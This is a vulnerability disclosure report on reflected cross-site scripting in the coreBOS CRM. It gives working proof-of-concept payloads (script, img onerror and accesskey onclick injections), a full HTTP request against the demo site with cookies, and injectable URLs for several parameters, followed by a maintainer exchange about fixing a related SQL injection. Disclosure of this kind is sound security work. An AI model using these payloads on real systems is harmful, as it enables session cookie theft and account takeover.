Cross-site Scripting (XSS) - Reflected in tsolucio/corebos
Reported on
Dec 20th 2021
Description
coreBOS is vulnerable to Reflected Cross-Site Scripting in the advft_criteria_groups - advft_criteria parameters.
Payload
- Outside the JSON object.
><script>alert(document.cookie)</script>
- Inside the JSON object.
[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:Vqvl14><img src=a onerror=alert(1)>znemq","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}]
Request
GET /index.php?module=Documents&action=Popup&html=Popup_picker&forfield=gendoctemplateburr&srcmodule=evvtgendoc&forrecord=&form=&query=true&search=true&searchtype=advance&advft_criteria=[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}><script>alert(1)</script>&advft_criteria_groups=[null,{%22groupcondition%22:%22%22}]><script>alert(2)</script> HTTP/1.1
Host: demo.corebos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.corebos.com/index.php?action=index&module=evvtgendoc
Cookie: democoreboscom=8f928841548129a8317753f05afccd66; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=4101476105348538
Impact
This vulnerability is capable of stealing users' cookies and gaining full account take over through his credentials.
Occurrences
RecycleBinUtils.php L41-L54
Get Request:
- paramteter > type
https://demo.corebos.com/index.php?module=RecycleBin&action=RecycleBinAjax&file=index&mode=ajax&ajax=true&gname=&query=true&search_field=accountname&searchtype=BasicSearch&operator=s&type=alpbttb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k&search_text=Q&form=&forfield=&srcmodule=&forrecord=&selected_module=Accounts&__vt5rftk=sid:fb865148cbe7a0b1f0dd2c7a227b0c2c1a7d0667,1640278340&null=
Payload
click SHIFT + ALT + X to trigger the payload
tb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k
NewReport0.php L109-L131
Get Request:
- paramteter > reportmodule
https://demo.corebos.com/index.php?module=Reports&action=ReportsAjax&file=NewReport0&folder=13&reportmodule=Assetsacaco<script>alert(1)</script>kle7w&cbreporttype=directsq
Payload
Assetsacaco<script>alert(1)</script>kle7w
Hi @itsfading
Thank you so much for your effort. I really appreciate it. In coreBOS we do not use mysqli_real_escape_string, we use pquery instead
$adb->pquery(SQL, array(of, parameters));
can you change those?
Hi Joe, I think you are referring to the SQL Injection report and it is not related to something here right? I am not quite aware of the syntax of pquery and cannot find documentation for it. Also, it seems you are using it correctly in some places but the vulnerability is still working that's why I used mysqli_real_escape_string whenever you take the input from the user.
